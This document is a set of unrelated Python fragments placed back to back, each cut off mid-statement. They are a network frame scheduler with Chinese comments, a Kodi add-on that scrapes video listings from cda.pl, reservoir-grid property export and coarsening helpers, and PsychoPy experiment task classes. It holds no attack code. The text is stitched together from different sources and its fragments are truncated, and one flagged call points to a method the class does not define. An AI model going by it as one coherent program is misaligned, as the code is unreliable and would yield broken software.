res for recv in receivers: path = networkx.algorithms.shortest_simple_paths(res, sender, recv) self._reciever_path[recv].extend(next(path)) def __str__(self): return pprint.pformat(self._reciever_path) @property def receiver_path(self) -> typing.Dict[str, typing.List[str]]: return self._reciever_path @property def app(self): return self._app @property def receive_task(self): return self._receive_task def draw(self): g = self._network.graph.to_undirected() res = networkx.algorithms.approximation.steiner_tree(g, [self._sender] + self._receivers) networkx.draw_networkx(g, networkx.shell_layout(g), ax=None) networkx.draw_networkx_edges( res, pos=networkx.shell_layout(g), edge_color='r') plt.axis('off') plt.show() class Application(NamedObj): """代表运行在一个节点上的应用程序 一个应用程序可以包含多条虚链路 并在其生命周期内发送一个数据帧 """ def __init__(self, network: Network, name: str, sender_node_name: str): super().__init__(name) self._network: Network = network self._vlink: VirtualLink = None self._frame: Frame = None self._host_node: Node = network[sender_node_name] self._peroid: int = 1 self._max_delay: int = 0 self._depend_on_list: typing.Set['Application'] = set() def set_virtual_link(self, receivers: typing.List['Application']) -> 'Application': if self._frame is not None: raise Exception("only one vlink in per application") if len(receivers) != 1: raise Exception("only one receiver in per vlink") vlink = VirtualLink(f'{self.name}_vlink', self._network, self, self._host_node, [ x._host_node for x in receivers], receivers[0]) self._vlink = vlink return self def set_frame(self, peroid: int, max_delay: int = 9999, min_offset: int = 0, max_offset: int = 9999999) -> 'Application': """定义一个在某虚链路上发送的数据帧 Arguments: peroid {int} -- 帧的周期 max_delay {int} -- 帧的最大延迟 """ if self._frame is not None: raise Exception("only one frame in per application") self._frame = Frame(self, peroid) self._frame.min_offset = min_offset self._frame.max_offset = max_offset self._max_delay = max_delay self._peroid = peroid return self def 
class MiddleResultMap:
    """Placeholder mapping keyed by (Link, Frame) pairs.

    Both accessors are stubs: lookups always return None and stores are
    silently discarded.  Presumably intended to cache intermediate solver
    results per link/frame -- TODO confirm before relying on it.
    """

    def __getitem__(self, key: typing.Tuple[Link, Frame]):
        # Stub: always returns None.
        pass

    def __setitem__(self, key: typing.Tuple[Link, Frame], value):
        # Stub: silently drops the value.
        pass
self._frames_on_link[link] def on_send_from_sender(self, app: Application, node: EndNode, frame: Frame, frame_seq_in_peroid: int, start_link: Link): #print(f'{app}: send from {node}') pass def on_add_to_link(self, app: Application, link: Link, frame: Frame, frame_seq_in_peroid: int): """当新的数据帧需要经过该链路时被调用 Arguments: link {Link} -- 数据帧经过的链路 frame {Frame} -- 新加入的数据帧 """ #print(f'{app}: send frame_{frame.id} on {link}') self._frames_on_link[link].add((frame, frame_seq_in_peroid)) def on_switch(self, app: Application, switch: SwitchNode, frame: Frame, frame_seq_in_peroid: int, before_link: Link, after_link): """当帧经过一个交换机时被调用 Arguments: app {Application} -- [description] switch {SwitchNode} -- [description] before_link {Link} -- [description] after_link {[type]} -- [description] """ #print(f'{app}: frame_{frame.id} get switch {switch}') def on_received(self, app: Application, receiver: EndNode, frame: Frame, frame_seq_in_peroid: int, first_link: Link, last_link: Link): """当帧到达接收者时被调用 Arguments: app {Application} -- 应用 receiver {EndNode} -- 接收者 first_link {Link} -- 发送者的链路 last_link {Link} -- 接收者的链路 """ #print(f'{app}: frame_{frame.id} arrive in {receiver}') self._app_last_link[app] = last_link def solve(self): return {} def to_dataframe(self): df = pandas.DataFrame(columns=['app', 'frame', 'link', 'time_slot']) result = self.solve() if not result: return df for key, value in result.items(): app, frame, link = self.extract_var_name(key) _fraction: Fraction = value.as_fraction() _numerator: int = _fraction.numerator _denominator: int = _fraction.denominator df.loc[len(df)] = [app, frame, link, _numerator // _denominator] return df class Scheduler: def __init__(self, network: Network): self._network: Network = network self._apps: typing.List[Application] = list() self._app_name_map: typing.Dict[str, Application] = dict() def add_apps(self, apps: typing.List[Application]): self._apps.extend(apps) self._app_name_map.update([(app.name, app) for app in apps]) @staticmethod def 
_lcm(a, b): return int((a * b) / math.gcd(a, b)) @property def app_lcm(self): result = 1 for app in self._apps: result = self._lcm(result, app.peroid) return result @staticmethod def _app_topo_sort(apps: typing.List[Application]): g = networkx.DiGraph() for app in apps: g.add_node(app.name) for dep in app.deps: g.add_edge(dep.name, app.name) return list(networkx.algorithms.topological_sort(g)) def _solve_vlink(self, vlink: VirtualLink, hook: ModelHook): # 从vlink头到尾进行遍历 first_link: Link = None for recv, path in vlink.receiver_path.items(): for frame_seq_in_peroid in range(self.app_lcm // vlink.app.peroid): start_node: str = None for idx, path_item in enumerate(path): if start_node
# -*- coding: utf-8 -*- import urllib, urllib2, re, os, sys, math import xbmcgui, xbmc, xbmcaddon, xbmcplugin from urlparse import urlparse, parse_qs import urlparse from BeautifulSoup import BeautifulSoup import time, datetime import HTMLParser #todo: BeautifulSoup scriptID = 'plugin.video.mrknow' scriptname = "Filmy online www.mrknow.pl - cda.pl" ptv = xbmcaddon.Addon(scriptID) BASE_RESOURCE_PATH = os.path.join(ptv.getAddonInfo('path'), "../resources") sys.path.append(os.path.join(BASE_RESOURCE_PATH, "lib")) import mrknow_pLog, mrknow_pCommon, mrknow_Parser, mrknow_urlparser from search import Search log = mrknow_pLog.pLog() mainUrl = 'http://www.cda.pl/' mainUrlb = 'http://www.cda.pl' movies = 'http://www.cda.pl/video/show/ca%C5%82e_filmy_or_ca%C5%82y_film_or_lektor_or_dubbing_or_napisy/p1' HOST = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.99 Safari/537.36' MENU_TAB = {1: "Filmy najtrafniejsze", 2: "Filmy najwyżej ocenione", 3: "Filmy popularne", 4: "Filmy najnowsze", 5: "Filmy alfabetycznie", 6: "Najnowsze", 7: "Video najpopularniejsze na FB", 8: "Video najlepiej ocenione", 9: "Krótkie filmy i animacje", 10: "Filmy Extremalne", 11: "Motoryzacja, wypadki", 12: "Muzyka", 13: "Prosto z Polski", 14: "Rozrywka", 15: "Różności", 16: "Sport", 17: "Śmieszne filmy", 27: "Szukaj"} PREM = { "http://www.cda.pl/premium/akcji": "Akcja", "http://www.cda.pl/premium/dramaty": "Dramaty", "http://www.cda.pl/premium/familijne": "Familijne", "http://www.cda.pl/premium/fantasy": "Fantasy", "http://www.cda.pl/premium/historyczne": "Historyczne", "http://www.cda.pl/premium/horror": "Horror", "http://www.cda.pl/premium/komedie": "Komedie", "http://www.cda.pl/premium/kryminalne": "Kryminalne", "http://www.cda.pl/premium/muzyczne": "Muzyczne", "http://www.cda.pl/premium/obyczajowe": "Obyczajowe", "http://www.cda.pl/premium/polskie": "Polskie", "http://www.cda.pl/premium/przygodowe": "Przygodowe", "http://www.cda.pl/premium/psychologiczne": 
def make_link(base, url):
    """Return `url` unchanged if it is absolute, otherwise prefix it with `base`.

    A URL counts as absolute when it contains a scheme separator ('://').
    TODO: handle the presence/absence of a '/' between the two parts properly.
    """
    return url if '://' in url else base + url
    def date_to_millis(self, typ=0):
        """Return the current timestamp as a string.

        typ == 1 returns the epoch seconds scaled by 10; any other value
        returns them scaled by 1000 (milliseconds style, as the name suggests).

        NOTE(review): mixes utcnow() with time.mktime(), which interprets the
        time tuple as *local* time -- the result is offset from true UTC by the
        local timezone; confirm whether the remote site actually expects that.
        """
        d = datetime.datetime.utcnow()
        if typ == 1:
            return str(int(time.mktime(d.timetuple())) * 10)
        return str(int(time.mktime(d.timetuple())) * 1000)
self.COOKIEFILE, 'use_post': False, 'return_data': True} log.debug(u'QUERY: {}'.format(query_data)) link = self.cm.getURLRequestData(query_data) soup = BeautifulSoup(link) linki_ost1 = soup.find('div', {"id": "dodane_video"}) linki_all1 = linki_ost1.findAll('label') if linki_ost1 else () for mylink in linki_all1: log.info(u'AA attrs:{}, content:{}'.format(mylink.attrs, mylink.a)) log.debug(u'AA LAABEL: {}'.format(mylink)) mytext = '' hd = mylink.find('span', {'class': 'hd-ico-elem hd-elem-pos'}) prem = mylink.find('span', {'class': 'flag-video-premium'}) if hd: log.info('cda.pl %s' % hd.text) if hd.text == '1080p': mytext = '[[COLOR yellow]' + hd.text + '[/COLOR]] - ' elif hd.text == '720p': mytext = '[[COLOR green]' + hd.text + '[/COLOR]] - ' else: mytext = '[' + hd.text + '] - ' if not mylink.a.img: log.info('Skipping element, no image with url (can be user folder)') continue if mylink.a.img.get('alt'): title = mylink.a.img['alt'] elif mylink.a.get('alt'): title = mylink.a['alt'] elif mylink.get('title'): title = u'[COLOR gray](BRAK: [I]{}[/I])[/COLOR]'.format(mylink['title']) else: title = u'[COLOR gray](BRAK)[/COLOR]' icon = make_link(mainUrlb, mylink.a.img['src']) if prem: mytext = mytext + '[COLOR yellow]PREMIUM[/COLOR] ' if self.premium: self.add('playSelectedMovie', title=mytext + title, iconimage=icon, url=make_link(mainUrlb, mylink.a['href']), folder=False, isPlayable=False) else: self.add('playSelectedMovie', title=mytext + title, iconimage=icon, folder=False, isPlayable=False) else: self.add('playSelectedMovie', title=mytext + title, iconimage=icon, url=make_link(mainUrlb, mylink.a['href']), folder=False, isPlayable=False) for match in re.finditer(r'<span class="next-wrapper"><a class="sbmBigNext btn-my btn-large fiximg" href="(.*?)" onclick="(.*?)">\s*<span class="hide-loader btn-loader-lft">', link, re.DOTALL): myurl = make_link_quote(mainUrlb, match.group(1)) self.add('categories-menu', 'Następna strona', url=myurl, folder=True, isPlayable=False, 
strona=myurl) xbmcplugin.endOfDirectory(int(sys.argv[1])) def listsItems2(self, url): query_data = {'url': url, 'use_host': False, 'use_cookie': False, 'use_post': False, 'return_data': True} link = self.cm.getURLRequestData(query_data) soup = BeautifulSoup(link) linki_ost1 = soup.find('div', {"class": "rigthWrapColumn"}) linki_all1 = linki_ost1.findAll('div', {'class': 'videoElem'}) if linki_ost1 else () linki_all1 += linki_ost1.findAll('div', {'class': 'video-clip'}) if linki_ost1 else () for mylink in linki_all1: # print("m",mylink.a.text,mylink.a['href']) mytext = '' hd = mylink.find('span', {'class': 'hd-ico-elem hd-elem-pos'}) if hd: log.info('cda.pl %s' % hd.text) if hd.text == '1080p': mytext = '[[COLOR yellow]' + hd.text + '[/COLOR]] - ' elif hd.text == '720p': mytext = '[[COLOR green]' + hd.text + '[/COLOR]] - ' else: mytext = '[' + hd.text + '] - ' self.add('playSelectedMovie', title=mytext + mylink.a['alt'], iconimage=mylink.a.img['src'], url=make_link(mainUrlb, mylink.a['href']), folder=False, isPlayable=False) match10 = re.compile( '<span class="next-wrapper"><a class="sbmBigNext btn-my btn-large fiximg" href="(.*?)" onclick="(.*?)">\n<span class="hide-loader btn-loader-lft">', re.DOTALL).findall(link) if match10: myurl = make_link_quote(mainUrlb, match10[0][0]) self.add('main-menu', 'Następna strona', url=myurl, folder=True, isPlayable=False) xbmcplugin.endOfDirectory(int(sys.argv[1])) def getMovieLinkFromXML(self, url): options = "" if ptv.getSetting('cda_show_rate') == 'true': options = 'bitrate' return self.up.getVideoLink(url, "", options) def add(self, name, category=None, title=None, iconimage=None, url=None, desc=None, rating=None, folder=True, isPlayable=True, strona='', service=None): # TODO: someting with unused arguments "descr", "rating" if not service: service = 'cdapl' if not category: category = 'NONE' if not title: title = 'NONE' if not iconimage: iconimage = 'NONE' if not url: url = 'NONE' title = 
HTMLParser.HTMLParser().unescape(title) u = sys.argv[0] + "?service=" + service + "&name=" + name + "&category=" + category + \ "&title=" + title + "&url=" + urllib.quote_plus(url) + "&icon=" + \ urllib.quote_plus(iconimage) + "&strona=" + urllib.quote_plus(strona) # log.info(str(u)) if name == 'main-menu' or name == 'categories-menu': title = category if iconimage == '': iconimage = "DefaultVideo.png" liz = xbmcgui.ListItem(title, iconImage="DefaultFolder.png", thumbnailImage=iconimage) if isPlayable: liz.setProperty("IsPlayable", "true") liz.setInfo(type="Video", infoLabels={"Title": title}) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=u, listitem=liz, isFolder=folder) def LOAD_AND_PLAY_VIDEO(self, videoUrl, title, icon): ok = True mrknow_pCommon.mystat(videoUrl) log('moje url = %s' % videoUrl) if videoUrl == '': d = xbmcgui.Dialog() d.ok('Nie znaleziono streamingu.', 'Może to chwilowa awaria.', 'Spróbuj ponownie za jakiś czas') return False liz = xbmcgui.ListItem(title, iconImage=icon, thumbnailImage=icon) liz.setInfo(type="Video", infoLabels={"Title": title, }) try: xbmcPlayer = xbmc.Player() xbmcPlayer.play(videoUrl, liz) if not xbmc.Player().isPlaying(): xbmc.sleep(10000) # xbmcPlayer.play(url, liz) except: d = xbmcgui.Dialog() d.ok('Błąd przy przetwarzaniu.', 'Problem') return ok def handleService(self): params = self.parser.getParams() name = self.parser.getParam(params, "name") category = self.parser.getParam(params, "category") url = self.parser.getParam(params, "url") title = self.parser.getParam(params, "title") icon = self.parser.getParam(params, "icon") strona = self.parser.getParam(params, "strona") print ("Dane", url, name, category, title) #log.info("Dane: url:%s, name:%s, category:%s, title=%s" % (url, name, category, title)) if url is not None: log.info('[cda.pl] url:%s' % url) if name is None: self.listsMainMenu(MENU_TAB) elif name == 'main-menu' and category == '[COLOR yellow]PREMIUM[/COLOR]': self.listsMainMenu2(PREM) elif name == 
'main-menu2': self.listsItems3(url) elif name == 'main-menu' and category == 'Najnowsze': self.listsItems2('http://www.cda.pl/video/p1') elif name == 'main-menu' and category == 'Video najpopularniejsze na FB': self.listsItems2('http://www.cda.pl/video/p1?o=popular&k=miesiac') elif name == 'main-menu' and category == 'Video najlepiej ocenione': self.listsItems2('http://www.cda.pl/video/p1?o=top&k=miesiac') elif name == 'main-menu' and category == 'Krótkie filmy i animacje': self.listsItems2('http://www.cda.pl/video/kat26/p1') elif name == 'main-menu' and category == 'Filmy Extremalne': self.listsItems2('http://www.cda.pl/video/kat24/p1') elif name == 'main-menu' and category == 'Motoryzacja, wypadki': self.listsItems2('http://www.cda.pl/video/kat27/p1') elif name == 'main-menu' and category == 'Muzyka': self.listsItems2('http://www.cda.pl/video/kat28/p1') elif name == 'main-menu' and category == 'Prosto z Polski': self.listsItems2('http://www.cda.pl/video/kat29/p1') elif name == 'main-menu' and category == 'Rozrywka': self.listsItems2('http://www.cda.pl/video/kat30/p1') elif name == 'main-menu' and category == 'Różności': self.listsItems2('http://www.cda.pl/video/kat33/p1') elif name == 'main-menu' and category == 'Sport': self.listsItems2('http://www.cda.pl/video/kat31/p1') elif name == 'main-menu' and category
True, a space is inserted between values; if False, a tab is used use_binary (boolean, optional, default False): if True, a pure binary copy of the array is written binary_only (boolean, optional, default False): if True, and if use_binary is True, then no ascii file is generated; if False (or if use_binary is False) then an ascii file is written nan_substitute_value (float, optional, default None): if a value is supplied, any not-a-number values are replaced with this value in the exported file (the cached property array remains unchanged); if None, then 'nan' or 'Nan' will appear in the ascii export file """ array_ref = self.cached_part_array_ref(part) assert (array_ref is not None) extent_kji = array_ref.shape assert (len(extent_kji) == 3) wd.write_array_to_ascii_file(file_name, extent_kji, array_ref, headers = headers, keyword = keyword, columns = columns, data_type = rqet.simplified_data_type(array_ref.dtype), decimals = decimals, target_simulator = 'nexus', blank_line_after_i_block = blank_line_after_i_block, blank_line_after_j_block = blank_line_after_j_block, space_separated = space_separated, append = append, use_binary = use_binary, binary_only = binary_only, nan_substitute_value = nan_substitute_value) def write_nexus_property_generating_filename( self, part, directory, use_title_for_keyword = False, headers = True, columns = 20, decimals = 3, # note: decimals only applicable to real numbers blank_line_after_i_block = True, blank_line_after_j_block = False, space_separated = False, # default is tab separated use_binary = False, binary_only = False, nan_substitute_value = None): """Writes the property array to a file using a filename generated from the citation title etc. 
arguments: part (string): the part name for which the array is to be exported directory (string): the path of the diractory into which the file will be written use_title_for_keyword (boolean, optional, default False): if True, the citation title for the property part is used as a keyword in the ascii export file for other arguments, see the docstring for the write_nexus_property() function note: the generated filename consists of: the citation title (with spaces replaced with underscores); the facet type and facet, if present; _t_ and the time_index, if the part has a time index _r_ and the realisation number, if the part has a realisation number """ title = self.citation_title_for_part(part).replace(' ', '_') if use_title_for_keyword: keyword = title else: keyword = None fname = title facet_type = self.facet_type_for_part(part) if facet_type is not None: fname += '_' + facet_type.replace(' ', '_') + '_' + self.facet_for_part(part).replace(' ', '_') time_index = self.time_index_for_part(part) if time_index is not None: fname += '_t_' + str(time_index) realisation = self.realization_for_part(part) if realisation is not None: fname += '_r_' + str(realisation) # could add .dat extension self.write_nexus_property(part, os.path.join(directory, fname), keyword = keyword, headers = headers, append = False, columns = columns, decimals = decimals, blank_line_after_i_block = blank_line_after_i_block, blank_line_after_j_block = blank_line_after_j_block, space_separated = space_separated, use_binary = use_binary, binary_only = binary_only, nan_substitute_value = nan_substitute_value) def write_nexus_collection(self, directory, use_title_for_keyword = False, headers = True, columns = 20, decimals = 3, blank_line_after_i_block = True, blank_line_after_j_block = False, space_separated = False, use_binary = False, binary_only = False, nan_substitute_value = None): """Writes a set of files, one for each part in the collection. 
arguments: directory (string): the path of the diractory into which the files will be written for other arguments, see the docstrings for the write_nexus_property_generating_filename() and write_nexus_property() functions note: the generated filenames are based on the citation titles etc., as for write_nexus_property_generating_filename() """ for part in self.dict.keys(): self.write_nexus_property_generating_filename(part, directory, use_title_for_keyword = use_title_for_keyword, headers = headers, columns = columns, decimals = decimals, blank_line_after_i_block = blank_line_after_i_block, blank_line_after_j_block = blank_line_after_j_block, space_separated = space_separated, use_binary = use_binary, binary_only = binary_only, nan_substitute_value = nan_substitute_value) def _array_box(collection, part, box = None, uncache_other_arrays = True): full_array = collection.cached_part_array_ref(part) if box is None: a = full_array.copy() else: a = full_array[box[0, 0]:box[1, 0] + 1, box[0, 1]:box[1, 1] + 1, box[0, 2]:box[1, 2] + 1].copy() full_array = None if uncache_other_arrays: collection.uncache_part_array(part) return a def _coarsening_sample(coarsening, a): # for now just take value from first cell in box # todo: find most common element in box a_coarsened = np.empty(tuple(coarsening.coarse_extent_kji), dtype = a.dtype) assert a.shape == tuple(coarsening.fine_extent_kji) # todo: try to figure out some numpy slice operations to avoid use of for loops for k in range(coarsening.coarse_extent_kji[0]): for j in range(coarsening.coarse_extent_kji[1]): for i in range(coarsening.coarse_extent_kji[2]): # local box within lgc space of fine cells, for 1 coarse cell cell_box = coarsening.fine_box_for_coarse((k, j, i)) a_coarsened[k, j, i] = a[tuple(cell_box[0])] return a_coarsened def _coarsening_sum(coarsening, a, axis = None): a_coarsened = np.empty(tuple(coarsening.coarse_extent_kji)) assert a.shape == tuple(coarsening.fine_extent_kji) # todo: try to figure out some numpy 
def _coarsening_weighted_mean(coarsening, a, fine_weight, coarse_weight = None, zero_weight_result = np.nan):
    """Coarsen array `a` as a weighted mean over each coarse cell's box of fine cells.

    arguments:
       coarsening: object mapping between fine and coarse grids (supplies extents and per-cell boxes)
       a (numpy array): fine grid property values, of shape coarsening.fine_extent_kji
       fine_weight (numpy array): per fine cell weights, same shape as a
       coarse_weight (numpy array, optional): pre-computed per coarse cell total weights; when
          supplied, the weighted sums are divided by these instead of by sums of fine weights
       zero_weight_result (float, default NaN): value used where the total weight is zero or NaN

    note: default changed from np.NaN to np.nan (same value); the np.NaN alias was removed in NumPy 2.0
    """
    a_coarsened = np.empty(tuple(coarsening.coarse_extent_kji))
    assert a.shape == tuple(coarsening.fine_extent_kji)
    assert fine_weight.shape == a.shape
    if coarse_weight is not None:
        assert coarse_weight.shape == a_coarsened.shape
    for k in range(coarsening.coarse_extent_kji[0]):
        for j in range(coarsening.coarse_extent_kji[1]):
            for i in range(coarsening.coarse_extent_kji[2]):
                _coarsening_weighted_mean_singlecell(a_coarsened, a, coarsening, k, j, i, fine_weight,
                                                     coarse_weight, zero_weight_result)
    if coarse_weight is not None:
        # treat zero or NaN total weight as 'no data' for the coarse cell
        mask = np.logical_or(np.isnan(coarse_weight), coarse_weight == 0.0)
        a_coarsened = np.where(mask, zero_weight_result, a_coarsened / coarse_weight)
    return a_coarsened
def _add_to_imported(collection, a, title, info, null_value = None, const_value = None):
    """Adds array `a` to the collection's imported list, with metadata unpacked from `info`.

    arguments:
       collection: property collection whose add_cached_array_to_imported_list() is called
       a: the cached array (presumably may be None when const_value is supplied -- TODO confirm)
       title: source info string passed through to the imported list
       info (indexable): per-part metadata; the index meanings noted below are inferred from the
          keyword each element is passed as -- verify against the producer of `info`
       null_value: null value passed through unchanged
       const_value: constant value alternative to the array, passed through unchanged
    """
    collection.add_cached_array_to_imported_list(
        a,
        title,
        info[10],  # citation_title
        discrete = not info[4],  # info[4] presumably a 'continuous' flag -- TODO confirm
        indexable_element = 'cells',
        uom = info[15],  # unit of measure
        time_index = info[12],
        null_value = null_value,
        property_kind = info[7],
        local_property_kind_uuid = info[17],
        facet_type = info[8],
        facet = info[9],
        realization = info[0],
        const_value = const_value,
        points = info[21])
def _extend_imported_with_coarsening(collection, other, box, coarsening, realization, copy_all_realizations,
                                     uncache_other_arrays):
    # orchestrates coarsening of properties from fine collection 'other' into 'collection';
    # statement order matters: rv and ntg are coarsened first because the derived net-rock-volume
    # arrays are passed as weights to the poro / sat / perm steps below
    assert collection.support is not None and tuple(collection.support.extent_kji) == tuple(
        coarsening.coarse_extent_kji)
    # gather the fine scale source collections, one per property kind of interest
    source_rv, source_ntg, source_poro, source_sat, source_perm = _extend_imported_get_fine_collections(
        other, realization)
    fine_rv_array, coarse_rv_array = _extend_imported_coarsen_rock_volume(source_rv, other, box, collection,
                                                                          realization, uncache_other_arrays,
                                                                          coarsening, copy_all_realizations)
    fine_ntg_array, coarse_ntg_array = _extend_imported_coarsen_ntg(source_ntg, other, box, collection,
                                                                    realization, uncache_other_arrays, coarsening,
                                                                    copy_all_realizations, fine_rv_array,
                                                                    coarse_rv_array)
    # net rock volume arrays, derived from ntg and rv, used as weights for the steps below
    fine_nrv_array, coarse_nrv_array = _extend_imported_nrv_arrays(fine_ntg_array, coarse_ntg_array,
                                                                   fine_rv_array, coarse_rv_array)
    fine_poro_array, coarse_poro_array = _extend_imported_coarsen_poro(source_poro, other, box, collection,
                                                                       realization, uncache_other_arrays,
                                                                       coarsening, copy_all_realizations,
                                                                       fine_nrv_array, coarse_nrv_array)
    _extend_imported_coarsen_sat(source_sat, other, box, collection, realization, uncache_other_arrays,
                                 coarsening, copy_all_realizations, fine_nrv_array, coarse_nrv_array,
                                 fine_poro_array, coarse_poro_array)
    _extend_imported_coarsen_perm(source_perm, other, box, collection, realization, uncache_other_arrays,
                                  coarsening, copy_all_realizations, fine_nrv_array, coarse_nrv_array)
    _extend_imported_coarsen_lengths(other, box, collection, realization, uncache_other_arrays, coarsening,
                                     copy_all_realizations)
    # any remaining properties are coarsened last, with rock volume arrays available for weighting
    _extend_imported_coarsen_other(other, box, collection, realization, uncache_other_arrays, coarsening,
                                   copy_all_realizations, fine_rv_array, coarse_rv_array)


def _extend_imported_get_fine_collections(other, realization):
    # look for properties by kind, process in order: rock volume, net to gross ratio, porosity, permeability, saturation
    source_rv = selective_version_of_collection(other, realization =
realization, property_kind = 'rock volume') source_ntg = selective_version_of_collection(other, realization = realization, property_kind =
# NOTE(review): this chunk begins mid-method — the two statements below are the tail of a
# truncated _show_stim belonging to a class whose header lies outside this chunk
            mov.draw()
            self.window.flip()

    def run(self):
        """Runs the trial loop for this (movie based) task and returns the response dataframe."""
        # loop over trials
        self.all_trial_response = []  # pre-allocate
        for self.trial in self.target_file.index:
            # get trial_info + stims
            self._get_trial_info()
            # get current time (self.t0)
            self.t0 = self.get_current_trial_time()
            # show the fixation for the duration of iti
            self.show_fixation(self.t0, self.start_time - self.t0)
            # collect real_start_time for each block (self.real_start_time)
            self.get_real_start_time(self.t0)
            # flush any keys in buffer
            event.clearEvents()
            # Start timer before display (get self.t2)
            self.get_time_before_disp()
            # display stims. The responses will be recorded and checked once the video is shown
            self._show_stim()
            if self.target_file['display_trial_feedback'][self.trial] and self.response_made:
                self.display_trial_feedback(correct_response = self.correct_response)
            else:
                self.screen.fixation_cross()
            # update response
            self.update_trial_response()
            # 5 show fixation for the duration of the iti
            ## 5.1 get current time
            t_start_iti = self.get_current_trial_time()
            self.show_fixation(t_start_iti, self.iti_dur)
            # 6.
            self.screen_quit()
        # get the response dataframe
        rDf = self.get_task_response(all_trial_response=self.all_trial_response)
        return rDf


class SemanticPrediction(Task):
    """Sentence reading task: stem words are shown one by one, then a final word is judged for sense."""

    # @property
    # def instruction_text(self):
    #     return "Language Prediction Task\n\nYou will read a sentence and decide if the final word of the sentence makes sense\n\nIf the word makes sense, press 3\n\nIf the word does not make sense, press 4\n\nAnswer as quickly and as accurately as possible"

    def __init__(self, screen, target_file, run_end, task_name, study_name, target_num, ttl_flag, save = True):
        super(SemanticPrediction, self).__init__(screen, target_file, run_end, task_name, study_name,
                                                 target_num, ttl_flag, save_response = save)
        self.feedback_type = 'rt'  # reaction
        self.name = 'semantic_prediction'

    def _get_trial_info(self):
        # get trial info from the target file
        super().get_trial_info(self.trial)
        self.stem = self.target_file['stim'][self.trial]
        self.stem = self.stem.split()
        self.stem_word_dur = self.target_file['stem_word_dur'][self.trial]
        self.last_word = self.target_file['last_word'][self.trial]
        self.last_word_dur = self.target_file['last_word_dur'][self.trial]

    def _get_stims(self):
        # get stim (i.e. word)
        self.stem = self.target_file['stim'][self.trial]
        self.stem = self.stem.split()
        self.stem_word_dur = self.target_file['stem_word_dur'][self.trial]
        self.start_time = self.target_file['start_time'][self.trial]
        self.last_word = self.target_file['last_word'][self.trial]
        self.last_word_dur = self.target_file['last_word_dur'][self.trial]
        self.iti_dur = self.target_file['iti_dur'][self.trial]

    def _show_stem(self):
        # display stem words for fixed time
        for word in self.stem:
            self.word_start = self.get_current_trial_time()
            stim = visual.TextStim(self.window, text=word, pos=(0.0,0.0), color=(-1,-1,-1), units='deg')
            stim.draw()
            self.window.flip()
            # core.wait(self.stem_word_dur)
            # each word will remain on the screen for a certain amount of time (self.stem_word_dur)
            if self.ttl_flag:  # wait for ttl pulse
                while ttl.clock.getTime()-self.word_start <= self.stem_word_dur:
                    ttl.check()
            else:  # do not wait for ttl pulse
                while self.clock.getTime()-self.word_start <= self.stem_word_dur:
                    pass

    def _show_last_word(self):
        # display last word for fixed time
        self.word_start = self.get_current_trial_time()
        stim = visual.TextStim(self.window, text=self.last_word, pos=(0.0,0.0), color=(-1,-1,-1), units='deg')
        stim.draw()
        self.window.flip()

    def _show_stims_all(self):
        # show stem sentence
        self._show_stem()
        # display iti before final word presentation
        self.screen.fixation_cross()
        # core.wait(self.iti_dur)
        tc = self.get_current_trial_time()
        self.show_fixation(tc, self.iti_dur)
        # flush keys if any have been pressed
        event.clearEvents()
        # display last word for fixed time
        # NOTE(review): this calls _show_stim, which is not defined on this class —
        # presumably inherited from Task or intended to be _show_last_word; confirm
        self._show_stim()
        self.window.flip()

    def run(self):
        """Runs the semantic prediction trial loop and returns the response dataframe."""
        # run the task
        # loop over trials
        self.all_trial_response = []  # pre-allocate
        for self.trial in self.target_file.index:
            # get stims
            self._get_trial_info()
            # get current time (self.t0)
            self.t0 = self.get_current_trial_time()
            # show the fixation for the duration of iti
            # wait here till the startTime
            self.show_fixation(self.t0, self.start_time - self.t0)
            # collect real_start_time for each block (self.real_start_time)
            self.get_real_start_time(self.t0)
            # 1. show stems
            self._show_stem()
            # 2. display fixation for the duration of the delay
            ## 2.1 get the current time
            t_stem_end = self.get_current_trial_time()
            ## 2.2 get the delay duration
            self.screen.fixation_cross()
            self.show_fixation(t_stem_end, self.iti_dur)
            # 3. display the last word and collect reponse
            ## 3.1 display prob
            self._show_last_word()
            ## 3.2 get the time before collecting responses (self.t2)
            self.get_time_before_disp()
            # 3.3 collect response
            wait_time = self.target_file['trial_dur_correct'][self.trial]
            self.trial_response = self.check_trial_response(wait_time = wait_time,
                                                            trial_index = self.trial,
                                                            start_time = self.t0,
                                                            start_time_rt = self.t2)
            # 3.4 update response
            self.update_trial_response()
            # 4. display trial feedback
            if self.target_file['display_trial_feedback'][self.trial] and self.response_made:
                self.display_trial_feedback(correct_response = self.correct_response)
            else:
                self.screen.fixation_cross()
            # 5 show fixation for the duration of the iti
            ## 5.1 get current time
            t_start_iti = self.get_current_trial_time()
            self.show_fixation(t_start_iti, self.iti_dur)
            # 6.
            self.screen_quit()
        # get the response dataframe
        rDf = self.get_task_response(all_trial_response=self.all_trial_response)
        return rDf


class ActionObservation(Task):
    """Movie watching task: a soccer clip is played while responses are collected."""

    # @property
    # def instruction_text(self):
    #     return "Action Observation Task\n\nYou have to decide whether the soccer player scores a goal\n\nYou will get feedback on every trial\n\nPress TRUE for goal\n\nPress FALSE for miss"

    def __init__(self, screen, target_file, run_end, task_name, study_name, target_num, ttl_flag, save = True):
        super(ActionObservation, self).__init__(screen, target_file, run_end, task_name, study_name,
                                                target_num, ttl_flag, save_response = save)
        self.feedback_type = 'acc'  # reaction
        self.name = 'action_observation'

    def _get_trial_info(self):
        super().get_trial_info(self.trial)
        video_file = self.target_file['stim'][self.trial]
        # self.path_to_video = os.path.join(consts.stim_dir, self.study_name, self.task_name, "modified_clips", video_file)
        self.path_to_video = os.path.join(consts.stim_dir, self.study_name, self.task_name, "modified_clips", video_file)

    def _show_stim(self):
        # NOTE(review): loop nesting below reconstructed from mangled source — confirm that the
        # response check is intended to run on every frame of the inner timing loop
        mov = visual.MovieStim3(self.window, self.path_to_video, flipVert=False, flipHoriz=False, loop=False)
        # play movie
        self.trial_response_all = []
        wait_time = self.trial_dur
        while mov.status != visual.FINISHED:
            if self.ttl_flag:
                while (ttl.clock.getTime() - self.t0 <= wait_time):
                    ttl.check()
                    # draw frame to screen
                    mov.draw()
                    self.window.flip()
                    # get trial response
                    self.trial_response = self.check_trial_response(wait_time = wait_time,
                                                                    trial_index = self.trial,
                                                                    start_time = self.t0,
                                                                    start_time_rt = self.t2)
            else:
                while (self.clock.getTime() - self.t0 <= wait_time):
                    # draw frame to screen
                    mov.draw()
                    self.window.flip()
                    # get trial response
                    self.trial_response = self.check_trial_response(wait_time = wait_time,
